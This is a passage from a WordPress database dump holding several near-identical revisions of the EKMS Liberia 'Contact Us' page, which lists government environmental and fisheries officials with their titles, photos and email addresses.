Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:12','2021-01-22 10:34:12','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3407,42,'2021-01-22 10:34:52','2021-01-22 10:34:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:52','2021-01-22 10:34:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3408,42,'2021-01-22 10:34:52','2021-01-22 10:34:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:34:52','2021-01-22 10:34:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3409,42,'2021-01-22 10:34:52','2021-01-22 10:34:52','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, 